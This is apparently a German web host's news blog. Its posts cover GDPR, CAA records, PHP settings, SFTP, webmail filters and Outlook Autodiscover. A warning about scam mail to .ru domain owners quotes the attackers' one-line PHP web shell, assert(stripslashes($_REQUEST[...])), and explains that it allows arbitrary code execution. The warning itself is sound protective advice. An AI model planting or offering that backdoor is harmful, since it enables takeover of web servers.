Was ändert sich durch die DSGVO?

Am Freitag, den 25.05.2018 tritt die neue EU-Datenschutzgrundverordnung (DSGVO / englisch: GDPR) in Kraft. Für Verbraucher bringt die DSGVO viel Gutes mit: Es gibt ein Recht auf Datenlöschung, ein Recht auf Widerspruch und ein Auskunftsrecht. Umfangreiche Informationspflichten sollen Transparenz bei der Datenverarbeitung sicherstellen. Das Prinzip der Datensparsamkeit steht künftig an oberster Stelle – nur Daten, die tatsächlich für die Erfüllung einer Aufgabe benötigt werden, dürfen erhoben, gespeichert und verarbeitet werden.

Leider bringen neue Gesetze oft auch eine Menge neuer Bürokratie mit sich. Besonders kleine Unternehmen und auch Privatpersonen mit eigenen Webseiten fühlen sich von den umfangreichen DSGVO-Regelungen überfordert. Wir möchten Ihnen in diesem Artikel einen kleinen Überblick darüber geben, was sich durch die DSGVO für die meisten unserer Kunden ändert und an welcher Stelle unsere Dienste mit der DSGVO in Berührung kommen. Der Artikel kann keine Rechtsberatung ersetzen und erhebt auch nicht den Anspruch, vollumfänglich über die DSGVO zu informieren – das ist angesichts der Fülle der Regeln kaum möglich.

Was muss ich als Betreiber einer Webseite beachten?

SSL-Zertifikate: Sobald Sie irgendeine Art von personenbezogenen Daten auf Ihrer Webseite erfassen – sei es über ein Kontaktformular, eine Newsletter-Anmeldung, einen Online-Shop oder sonstige Funktionen, bei denen ein Nutzer Ihnen gegenüber etwas Preis gibt, muss die jeweilige Webseite über ein SSL-Zertifikat (https://…) abgesichert werden. In vielen unserer Hosting-Pakete sind SSL-Zertifikate im Preis bereits enthalten; zusätzliche Zertifikate können ab 6,- Euro pro Jahr (Reseller: 3,- Euro pro Jahr) gebucht werden. Informationen zu den Unterschieden verschiedener Zertifikatstypen finden Sie auf unserer Webseite. Die Bestellung eines Zertifikats erfolgt formlos per E-Mail.

Datenschutzerklärung: Sie müssen in einer Datenschutzerklärung auf Ihrer Webseite angeben, wie Sie mit den Daten Ihrer Besucher umgehen. In erster Linie geht es dabei darum, welche Daten Sie (oder wir als Ihr Webhoster) von den Besuchern Ihrer Webseite speichern. Zur Erstellung einer DSGVO-konformen Datenschutzerklärung gibt es zahlreiche kostenlose und kostenpflichtige Generatoren im Internet; im Zweifelsfall konsultieren Sie bitte unbedingt einen Juristen. Bezüglich der von uns erstellten Logdateien ist wichtig, welche Daten wir serverseitig speichern. Bitte beachten Sie dazu folgende FAQ-Artikel: Wie lange werden die Logdateien aufbewahrt? und Wie sind die HTTP Access Logs aufgebaut?

Auftragsverarbeitungsvertrag: Als gewerblicher Betreiber einer Webseite sollten Sie mit uns einen Auftragsverarbeitungsvertrag abschließen. In diesem Vertrag ist geregelt, wie wir Ihre und die Daten Ihrer Kunden auf unseren Servern verarbeiten. Bestandteil des AV-Vertrags sind die „Technischen und organisatorischen Maßnahmen“, die wir anwenden, um Ihre Daten zu schützen. Der Abschluss eines AV-Vertrags mit uns ist hier unter Verwendung Ihrer persönlichen Zugangsdaten zum Kundenmenü möglich.

An dieser Stelle noch einmal der Hinweis: Diese Übersicht ist nicht vollständig. Je nach Branche und Art der Weise, wie Sie Daten erheben und verarbeiten, können und werden noch weitere Themen für Sie relevant sein, auf die wir hier nicht eingehen können.

Was ändert sich bei der Domainregistrierung?

Whois-Daten: Bei der Registrierung einer Domain wurden bisher bei den meisten Registrierungsstellen umfangreiche Daten des Domaininhabers, des administrativen Ansprechpartners und der technischen Kontakte abgefragt, darunter auch E-Mail-Adressen und Telefonnummern. Diese Daten wurden allerdings nicht nur bei den Registrierungsstellen gespeichert, sondern auch im öffentlichen Whois angezeigt. An beiden Punkten gibt es durch die DSGVO nun Änderungen. Einige Registrierungsstellen erfassen nur noch die Daten eines Domaininhabers; sowohl der administrative als auch der technische Kontakt entfällt bei diesen Top-Level-Domains (z.B. .de). Andere Registrierungsstellen erfassen weiterhin alle Daten, veröffentlichen im Whois aber nur noch einen kleinen Teil davon. Bei den meisten Top-Level-Domains wird im Falle einer Registrierung für eine Organisation der Name der Organisation und das Land, in dem die Organisation ihren Sitz hat, im Whois angezeigt. Bei Privatpersonen wird nur noch das Land des Inhabers angezeigt.

Vermittlung: Wie bisher kommt der Vertrag für eine Domainregistrierung zwischen dem Domaininhaber und der Registrierungsstelle zustande. Wir vermitteln diesen Vertrag und verwalten die Domains für Sie bei der Registrierungsstelle. Nach wie vor übermitteln wir Ihre Daten – je nach Top-Level-Domain – auch an Drittstaaten. Diese Übermittlung ist jedoch zwingende Voraussetzung dafür, die gewünschte Domain registrieren zu können.

Einrichtung von CAA-Records im Kundenmenü

Ab sofort lassen sich im DNS-Bereich des Kundenmenüs Einträge mit dem Typ „CAA“ (Certification Authority Authorization) anlegen. Sie dienen der Überprüfung, ob eine bestimmte Zertifizierungsstelle (z.B. Comodo oder Let’s Encrypt) ein SSL-Zertifikat für die jeweilige Domain ausstellen darf. Die Prüfung wird seit September 2017 von allen Zertifizierungsstellen bei der Neuausstellung und Verlängerung von Zertifikaten durchgeführt.

Existieren für eine Domain keine CAA-Einträge, kann jede Zertifizierungsstelle ein Zertifikat für die Domain ausstellen. Wenn CAA-Einträge existieren, darf nur die angegebene Zertifizierungsstelle ein Zertifikat ausstellen. Auf diese Weise wird die missbräuchliche Ausstellung von Zertifikaten deutlich erschwert.

Mehr Informationen und Beispiele zur Nutzung von CAA-Records finden Sie unserem FAQ-Artikel: Was sind CAA-Einträge und wie funktionieren sie?

Probleme bei der Installation von Joomla

Aufgrund eines Programmierfehlers im Installer der aktuellen Joomla-Version 3.7.4 lässt sich diese nicht auf unseren Webservern installieren. Die Fortschrittsanzeige bei der Installation bleibt bei etwa 10% stehen, dann passiert nichts mehr.

Der Fehler ist den Joomla-Entwicklern bekannt und wird in der nächsten Joomla-Version behoben. Bitte nutzen Sie für eine Neuinstallation von Joomla bis dahin die Vorgängerversion 3.7.3 und nehmen dann ein Update auf die aktuelle Joomla-Version vor.

Update

Der Fehler wurde in der neuen Joomla Version 3.7.5 behoben.

Gefährlicher Spam an Inhaber von .ru-Domains

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.

PHP-Version im Kundenmenü einstellbar

Ab sofort können Sie die für Ihre Webseiten genutzte PHP-Version mit zwei Klicks über unser Kundenmenü einstellen. Sie finden die neue Option im Menüpunkt „PHP“, der sich unter den Einstellungen Ihres Hosting-Pakets befindet. Die Einstellung gilt für alle Domains in Ihrem Hosting-Paket, eine Auswahl unterschiedlicher PHP-Versionen für einzelne Domains eines Pakets ist momentan noch nicht möglich.

Die Auswahl der PHP-Version ist jetzt im Kundenmenü möglich.

Sie können die PHP-Version auch wie gehabt per .htaccess-Konfigurationsdatei auf dem Webserver festlegen, diese Einstellung überschreibt dabei die im Kundenmenü gewählte PHP-Version. Auf diese Weise können Sie weiterhin für verschiedene Domains/Verzeichnisse unterschiedliche PHP-Versionen nutzen.

Die aktuell für Ihre Webseite konfigurierte PHP-Version können Sie über den PHP-Befehl phpinfo() ermitteln. Laden Sie dazu einfach unser vorgefertigtes PHP-Script herunter, das Sie dann per (S)FTP im gewünschten Webspace-Verzeichnis ablegen und dort über Ihren Web-Browser aufrufen (z.B. http://meine-domain.de/info.php).

SFTP für virtuelle FTP-Benutzer

Bisher konnten virtuelle FTP-Benutzer nur unverschlüsselte FTP-Verbindungen und kein verschlüsseltes SFTP nutzen, dies war nur für den FTP-Hauptbenutzer möglich. Da unverschlüsselte FTP-Verbindungen aus Sicherheitsgründen nicht mehr benutzt werden sollten, bieten wir ab sofort SFTP auch für virtuelle FTP-Benutzer über den TCP-Port 2222 an. Für weitere Informationen beachten Sie bitte den zugehörigen FAQ-Artikel.

Hintergründe

Der SFTP-Dienst wurde bisher nicht mittels des von uns für FTP-Verbindungen genutzten Dienstes ProFTPD realisiert, sondern über den SSH-Dienst OpenSSH, der im Gegensatz zu ProFTPD keine virtuellen Benutzer unterstützt. ProFTPD unterstützt zwar grundsätzlich auch SFTP-Verbindungen, allerdings kann OpenSSH nicht einfach durch ProFTPD ersetzt werden, da OpenSSH noch weitere Funktionen wie z.B. eine Login-Shell bereit stellt, auf die wir nicht verzichten können. Weiterhin war die SFTP-Unterstützung in ProFTPD in der Vergangenheit noch sehr fehlerbehaftet, es kam z.B. häufig zu Problemen beim Verbindungsaufbau. In der aktuellen ProFTPD-Version sind diese Fehler jedoch weitgehend behoben, so dass einem Produktiveinsatz nun nichts mehr im Wege steht.

Um SFTP für virtuelle FTP-Benutzer zu realisieren, nutzen wir den TCP-Port 2222, da der Standard-Port 22 bereits vom SSH-Dienst belegt ist. Sie können SFTP-Verbindungen sowohl für den FTP-Hauptbenutzer als auch für alle virtuellen Benutzer über diesen Port nutzen (der FTP-Hauptbenutzer kann jedoch auch weiter den Standard-Port 22 für SFTP nutzen).

Das neue Kundenmenü ist fertig!

Am vergangenen Wochenende haben wir unser etwas in die Tage gekommenes Kundenmenü durch eine neue, modernere Version ersetzt. Schon seit einiger Zeit stand die Beta-Version des neuen Kundenmenüs unter https://my-beta.variomedia.de für Tests zur Verfügung; viele Kunden haben bereits die neuen Features wie DynDNS und Open-Xchange genutzt.

Zahlreiche Rückmeldungen zur Beta-Version haben uns geholfen, die neue Version näher an den Wünschen unserer Kunden zu orientieren. Die neue Version ähnelt inhaltlich dem alten Kundenmenü, optisch und strukturell haben sich jedoch einige Änderungen ergeben:

  • Auf der linken Seite finden Sie die Links zu einer Übersicht Ihrer Domains und Pakete. Sie können außerdem die Domainpreisliste (mit Mengenrabatten) einsehen und Zusatzdomains bestellen.
  • In der Kopfzeile können Sie Ihre Rechnungen abrufen, Ihre persönlichen Daten einsehen und ändern, sowie zusätzliche Ansprechpartner eintragen. Oben rechts können Sie Ihr Kennwort ändern.
  • Nach dem Einloggen öffnet sich die Übersicht der Domains und Pakete im Hauptfenster. Neu ist hier, dass der nächste Verlängerungstermin aller Domains angezeigt wird. Liegt der angezeigte Termin in der Vergangenheit, bedeutet dies, dass die Domain bisher noch nicht abgerechnet wurde. Verlängerungen werden von uns grundsätzlich automatisch durchgeführt. Domains, die gekündigt wurden, werden in der Übersicht als gekündigt angezeigt.
  • Haben Sie mehrere Pakete (zum Beispiel einige Domains in einem Basic-Paket, andere Domains in einem Easy.B-Paket), können sie den Paketen künftig eigene Namen geben, zum Beispiel „Webspace für meine Tochter“ oder „Domain-Weiterleitungen auf Shop ABC“. Dies kann bei vielen Domains helfen, den Überblick zu behalten.
  • Wenn Sie auf den Namen eines Pakets klicken, finden Sie dort alle Informationen zur Nutzung dieses Pakets. Hier befinden sich bei Hosting-Paketen auch die Optionen für den FTP/SFTP/SSH-Zugang, sowie für MySQL. Diese Funktionen sind unabhängig von den jeweiligen Domains, die im Paket liegen – sie gelten für alle Domains gleichermaßen.
  • Klicken Sie eine Domain an, wenn Sie zum Beispiel eine E-Mail-Adresse anlegen oder konfigurieren wollen, Statistiken und Logdateien abrufen möchten oder DNS-Einträge bearbeiten wollen. Diese Funktionen hängen stets mit einer konkreten Domain zusammen und sind deshalb hier zu finden.

Da wir noch nicht alle Verbesserungs- und Änderungsvorschläge umsetzen konnten, wird es unter my-beta.variomedia.de auch künftig eine Beta-Version des Kundenmenüs geben. Hier werden wir jeweils die neuesten Entwicklungen zugänglich machen, die dann später auch im offiziellen Kundenmenü zu finden sind.

Für Kunden unserer Reseller wird das bisherige Kundenmenü noch eine Woche lang unter https://my.securehost.de nutzbar sein. Anschließend erfolgt auch hier die Umstellung auf das neue Kundenmenü.

Für Fragen zum neuen Kundenmenü, sowie für Änderungswünsche und Verbesserungsvorschläge für künftige Versionen stehen wir Ihnen gerne zur Verfügung!

Neues Sieve-Plugin im Webmail (serverbasierte Filterregeln für E-Mails)

Ab sofort steht in unserem Webmail ein neues Sieve-Plugin für die serverbasierte Filterung und Sortierung von eingehenden E-Mails zur Verfügung.

Serverbasierte Mailfilter („Sieve“) haben den Vorteil, dass sie unabhängig vom E-Mail-Client ausgeführt werden. Auf mobilen Clients stehen oft keine Filterfunktionen für E-Mails zur Verfügung. Es ist daher sinnvoll, eingehende E-Mails serverseitig zu sortieren, um im Posteingang den Überblick zu behalten. Auch wenn Sie E-Mails mit mehreren Geräten oder PCs lesen, müssen Sie dort die Filterregeln nicht mehrfach pflegen.

Das neue Sieve-Plugin im Webmail erlaubt feinste Abstufungen, die bisher nur deutlich komplizierter zu realisieren waren. So können Sie zum Beispiel E-Mails, mit einem bestimmten Dateityp im Anhang in einen bestimmten Ordner einsortieren, indem Sie folgende Regel anlegen – hier im Beispiel für gepackte ZIP-Dateien (siehe Bild oben):

Body –> Raw –> weitere Optionen –> trifft auf den regulären Ausdruck zu –> filename=“.+\.zip“

Bitte beachten Sie, dass die eingerichteten Filterregeln stets nur für neue, eingehende E-Mails funktionieren. E-Mails, die bereits im Posteingang liegen, lassen sich auf diese Weise nicht sortieren.

Probleme mit der Autodiscover-Funktion von Outlook und Exchange (ActiveSync)

Microsoft Outlook und andere Exchange-kompatible E-Mail-Programme nutzen einen sogenannten Autodiscover-Mechanismus, um die Einstellungen (z.B. Posteingangsserver, Postausgangsserver, Authentifizierungsmethode) zu einem E-Mail-Postfach automatisch zu erkennen. Leider hat dieser Mechanismus einen grundlegenden Konstruktionsfehler, der seit der Einführung von Let’s Encrypt-Zertifikaten auf unseren Webservern zu unerwarteten Problemen führt:

Bei der Einrichtung eines neuen Postfachs sucht Outlook zuerst unter der Domain der E-Mail-Adresse per HTTPS nach einer passenden Konfigurationsdatei (z.B. „https://variomedia.de/autodiscover/autodiscover.xml“). Wenn die Verbindung zum HTTPS Port 443 abgelehnt wird, oder die Konfigurationsdatei nicht exisitiert, wird im nächsten Schritt die Subdomain autodiscover probiert (z.B. „https://autodiscover.variomedia.de/autodiscover/autodiscover.xml“). Wenn auch dies fehlschlägt, wird im letzten Schritt nach einem Autodiscover-SRV-Eintrag im DNS gesucht. Wenn jedoch ein ungültiges SSL-Zertifikat für die (Sub-)Domain hinterlegt ist, so wird eine entsprechende Warnung angezeigt.

Leider hat Microsoft dabei nicht bedacht, dass es auch Webserver gibt, die Server Name Identification (SNI) für SSL-Zertifikate nutzen, um mehrere Zertifikate unter einer IP-Adresse zu ermöglichen. In diesem Fall ist für manche Domains ein SSL-Zertifikat hinterlegt, und für andere Domains nicht. Wenn auf eine Domain, für die kein gültiges SSL-Zertifikat hinterlegt ist, per HTTPS zugegriffen wird, so liefert der Webserver standardmäßig das erste vorhandene SSL-Zertifikat aus. Da dieses Zertifikat aber nicht für die angefragte Domain gilt, wird nun eine entsprechende Warnung angezeigt.

Falls Sie einen neuen E-Mail-Account in Outlook einrichten, und für Ihre Domain kein SSL-Zertifikat hinterlegt ist, kommt es daher nun immer zu einer Fehlermeldung. Ihnen wird dann das SSL-Zertifikat für „ws0.web.vrmd.de“ angezeigt. Sie können dieses Zertifikat entweder akzeptieren, oder die automatische Einrichtung mittels Autodiscover abbrechen.

Wir bieten einen Autodiscover-Dienst für Outlook und andere Exchange-kompatible E-Mail-Programme unter autodiscover.variomedia.de (bzw. autodiscover.securehost.de) an, der über einen SRV-Eintrag im DNS-Bereich genutzt werden kann. Diese SRV-Einträge wurden im Zuge der Einführung von Open-Xchange für alle Domains automatisch gesetzt.

Update vom 16.06.:

Wir werden für Let’s Encrypt Zertifikate zukünftig eine zusätzliche IP auf jedem Webserver einrichten, so dass die normale Webserver-IP keine HTTPS-Verbindungen mehr annimmt. Damit kann dieses Problem nicht mehr auftreten.

Probleme mit ownCloud und PHP 7

Gegenwärtig gibt es ein Problem mit ownCloud und der aktuellen PHP-Version 7.0.6, die wir am 29.04. auf allen Webservern installiert haben. Betroffen sind ausschließlich Kunden, die PHP 7 manuell über eine .htaccess-Konfigurationsdatei aktiviert haben. Unter PHP 7 wird beim Aufruf der ownCloud-Seite die Fehlermeldung „Interner Serverfehler“ angezeigt. Die Ursache ist ein Programmierfehler in ownCloud, der bei den vorigen PHP-Versionen noch keine Auswirkungen hatte.

Die einfachste Lösung für dieses Problem ist die ältere PHP-Version 5.6 zu nutzen, bis der Fehler durch ein ownCloud-Update behoben wird. Eine Anleitung zur Auswahl der PHP-Version finden Sie hier.

Falls Sie weiterhin PHP 7 nutzen möchten, muss die PHP-Datei „request.php“ im ownCloud-Unterverzeichnis „lib/private/appframework/http“ angepasst werden. Sie können diese Datei per (S)FTP herunterladen oder direkt auf dem Webserver mit einem Texteditor bearbeiten. Suchen Sie nach der Zeile „public function __isset($name) {“ und fügen dort die folgenden 3 grün markieren Zeilen hinzu:

    public function __isset($name) {
        if (in_array($name, $this->allowedKeys, true)) {
            return true;
        }
        return isset($this->items['parameters'][$name])
    }

Update vom 02.05.2016: Wir haben bei allen von uns für Kunden installierten Owncloud-Instanzen die entsprechenden Änderungen vorgenommen.